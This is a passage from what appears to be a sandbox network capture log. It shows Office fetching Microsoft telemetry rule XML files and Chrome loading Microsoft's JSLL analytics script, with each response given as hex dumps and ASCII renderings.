                                                                                                                                                                      2024-11-21 05:23:58 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      97192.168.2.64982313.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:57 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:58 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:58 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1356
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                      ETag: "0x8DC582BDC681E17"
                                                                                                                                                                      x-ms-request-id: c1a1f15b-901e-005b-358c-3a2005000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052358Z-178bfbc474bpnd5vhC1NYC4vr400000000zg00000000fgvh
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:58 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      98192.168.2.64982813.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:58 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:58 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1393
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                      ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                      x-ms-request-id: 3994331f-f01e-0071-696c-3b431c000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052358Z-178bfbc474brk967hC1NYCfu6000000000s000000000knnp
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:58 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      99192.168.2.64982913.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:58 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:58 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1356
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                      ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                      x-ms-request-id: 923400a1-601e-005c-187f-3bf06f000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052358Z-1777c6cb754xrr98hC1TEB3kag0000000abg00000000rag6
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:58 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      100192.168.2.64983113.107.246.454432120C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:58 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                      Host: js.monitor.azure.com
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                      Referer: https://learn.microsoft.com/
                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                      2024-11-21 05:23:58 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:58 GMT
                                                                                                                                                                      Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                      Content-Length: 207935
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                      Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                      ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                      x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                      x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                      x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                      x-azure-ref: 20241121T052358Z-r1d97b99577dd2gchC1TEBz5ys00000009n000000000ntvv
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:58 UTC15495INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                      Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                      2024-11-21 05:23:58 UTC16384INData Raw: 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28
                                                                                                                                                                      Data Ascii: (i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(
                                                                                                                                                                      2024-11-21 05:23:59 UTC16384INData Raw: 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                      Data Ascii: (e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(
                                                                                                                                                                      2024-11-21 05:23:59 UTC16384INData Raw: 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66
                                                                                                                                                                      Data Ascii: (e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};f
                                                                                                                                                                      2024-11-21 05:23:59 UTC16384INData Raw: 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                      Data Ascii: l:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return nul
                                                                                                                                                                      2024-11-21 05:23:59 UTC16384INData Raw: 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                      Data Ascii: o track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(
                                                                                                                                                                      2024-11-21 05:23:59 UTC16384INData Raw: 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54
                                                                                                                                                                      Data Ascii: coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageT
                                                                                                                                                                      2024-11-21 05:23:59 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
                                                                                                                                                                      Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
                                                                                                                                                                      2024-11-21 05:23:59 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                      Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                      2024-11-21 05:23:59 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                      Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      101192.168.2.64983013.107.246.454432120C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:58 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
